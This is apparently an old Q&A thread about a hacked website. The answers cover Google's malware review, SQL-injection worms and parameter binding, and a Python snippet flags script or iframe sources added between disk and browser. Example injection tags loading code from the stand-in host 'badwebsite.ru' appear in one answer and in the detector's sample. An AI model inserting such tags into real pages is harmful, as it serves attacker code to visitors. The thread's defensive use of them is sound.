3

My website www.sagamountain.com was recently infected by a malware distributor (or at least I think it may have been).

I have removed all external content, Google ads, firefly chat, etc.

I uploaded a backup from a few weeks ago, when there was no issue.

I patched the SQL injection hole.

Now, how long will it take to unmark it as dangerous? Where can I contact Google?

I am not sure if this is the right place to post it, but since it may have been a server issue I may as well. Can sites inject base64 code via a virus on the whole server, or is it only via SQL injection?

Thanks for the help, viruses freak me out.

Is there an online virus scanner that can scan my page and tell me what is wrong?

RichVel
Cyclone

2 Answers

4

In regards to Google, review their page about malware infected sites.

My site and Google › My site's been hacked

You will want to log in to their webmaster tools page, add your site to your account and perform the verification steps. Then you will get access to do things such as request your site be reviewed for no longer being infected.

ManiacZX
  • I already added it, but it says it is fine, yet I still have viruses. I'll check out the other link, thanks! – Cyclone Oct 26 '09 at 21:11
  • Turns out I still HAD the virus, but it was only the server that was infected instead of my files. Read my comment below. Thanks for your help!! – Cyclone Oct 26 '09 at 22:35
3

This is a relatively common problem these days. Many many worms attempt to get themselves in your server code via SQL injection, or by modifying local .html content which is then uploaded to a web server. Usually they will attempt to put:

<script src='http://badwebsite.ru/blah.js'></script>

or

<iframe src='http://badwebsite.ru/blah.html' />

into your source page via SQL injection or source code modification.

As far as I know the worms modify their attack vectors through JavaScript obfuscation engines or similar and are hard to scan against.

These attacks have been made possible by two recent, huge, remote code executions:

  • Adobe Flash JavaScript exploits which allow a Flash object to be created with about 15K of arbitrary code.
  • An exploit to the Windows Presentation Framework extension in Firefox installed by Microsoft .NET 3.5 on Windows systems.

Both of these are huge security risks.

You should use parameter binding in web application development whenever possible to avoid SQL injection attacks.

Kyle Smith
  • How can I find out what file is infected? I just found some JS that I know I did not put there. – Cyclone Oct 26 '09 at 19:41
  • Okay, the server itself is infected. I created a test HTML file which had an empty head and a body with only a title in it, but when I viewed it in the browser it had the JavaScript in it as well. Thank you for your help! – Cyclone Oct 26 '09 at 22:35
  • Unfortunately these recent security holes have created so many more attack vectors for worms. My father is in the SEO business and had an issue with a worm that sat on Windows XP workstations and searched for index.html files, inserting its \ – Kyle Smith Oct 28 '09 at 14:04
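
The check described in the comments above (a known-clean test file that comes back from the server with extra JavaScript) can be automated. This is an added example, not code from any poster: it compares a page's on-disk content with the served copy and reports `<script>`/`<iframe>` hosts that appear only in the served version. Function names and sample HTML are constructed for illustration; `badwebsite.ru` is the placeholder host used in the answer.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ExternalSources(HTMLParser):
    """Collect (tag, host) for every <script>/<iframe> whose src names a host."""

    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags such as <iframe ... />.
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src") or ""
        host = urlparse(src).hostname  # None for relative URLs like js/site.js
        if host:
            self.found.add((tag, host.lower()))


def external_sources(html, allowed_hosts=()):
    """Return the set of (tag, host) pairs not covered by the allowlist."""
    parser = _ExternalSources()
    parser.feed(html)
    parser.close()
    allowed = {h.lower() for h in allowed_hosts}
    return {(tag, host) for tag, host in parser.found if host not in allowed}


def injected_in_transit(on_disk, served, allowed_hosts=()):
    """Sources present in the served page but absent from the file on disk.

    A non-empty result with a clean file on disk points at the server
    (or something between it and the browser) rather than at the site files.
    """
    return (external_sources(served, allowed_hosts)
            - external_sources(on_disk, allowed_hosts))


# Constructed sample: a clean test file and the same file as a browser received it.
ON_DISK = ("<html><head></head><body><h1>Test</h1>"
           "<script src='js/site.js'></script></body></html>")
SERVED = ON_DISK.replace(
    "</body>", "<script src='http://badwebsite.ru/blah.js'></script></body>")

if __name__ == "__main__":
    for tag, host in sorted(injected_in_transit(ON_DISK, SERVED)):
        print(f"served copy adds <{tag}> loading from {host}")
```

In practice `on_disk` is read straight from the web root and `served` is the body of an HTTP request for the same path; running `external_sources` over every file in the web root covers the case where the files themselves were modified.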